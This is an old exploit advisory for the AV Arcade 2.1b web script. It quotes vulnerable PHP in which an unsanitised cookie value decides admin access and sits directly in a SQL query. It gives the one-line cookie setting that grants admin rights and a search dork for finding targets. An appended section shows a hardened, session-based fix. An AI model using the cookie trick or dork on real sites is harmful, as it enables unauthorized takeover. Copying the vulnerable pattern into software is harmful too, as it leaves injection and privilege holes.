
avarcade-admin.txt

Posted on 03 July 2007

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"
Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vulnerable code:

admin/index.php:

$sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");
while($row = mysql_fetch_array($sql)){
    if ($row['admin'] == 1) {
        define( 'ADMIN_ACCESS', 1 );
[...]

Exploit:

Set in your cookies: ava_userid = 1; and that's all :p

GREETZ: all memberz of RST and milw0rm

//kw3rln [ http://rstzone.net ]

[EOF]
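Added example, not part of the original advisory and not AV Arcade's own code: a hardened form of the admin/index.php check above, where the user id comes from server-side session state set at login instead of the ava_userid cookie, and is passed to the query as a bound parameter. The PDO handle, the session key ava_uid, the is_admin() helper and the in-memory SQLite rows are assumptions constructed for illustration.

```php
<?php
// Added example (assumptions: PDO instead of the mysql_* API, a session
// key named 'ava_uid' set by the login code, constructed sample rows).

function is_admin(PDO $db, array $session): bool
{
    // Identity is taken from server-side session data only. Nothing the
    // client sends in a cookie is consulted for the authorization decision.
    $uid = $session['ava_uid'] ?? null;
    if (!is_int($uid) || $uid < 1) {
        return false; // not logged in, or value is not a clean integer
    }

    // Bound parameter: the id is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT admin FROM ava_users WHERE id = :id');
    $stmt->execute([':id' => $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    return $row !== false && (int) $row['admin'] === 1;
}

// Constructed sample data standing in for the ava_users table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ava_users (id INTEGER PRIMARY KEY, username TEXT, admin INTEGER)');
$db->exec("INSERT INTO ava_users VALUES (1, 'admin', 1), (2, 'player', 0)");

// The cookie is present on the request but plays no part in the check.
$_COOKIE['ava_userid'] = '1';

var_dump(is_admin($db, []));                  // cookie only, no login session
var_dump(is_admin($db, ['ava_uid' => 2]));    // logged in as a normal user
var_dump(is_admin($db, ['ava_uid' => 1]));    // logged in as the admin account
var_dump(is_admin($db, ['ava_uid' => '1x'])); // non-integer session value

// Gate the admin area the way admin/index.php does, but on the session:
if (is_admin($db, $_SESSION ?? [])) {
    define('ADMIN_ACCESS', 1);
}
```

In a real deployment the login handler would verify the password, call session_regenerate_id(true), and only then store the integer id in $_SESSION['ava_uid'].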

 
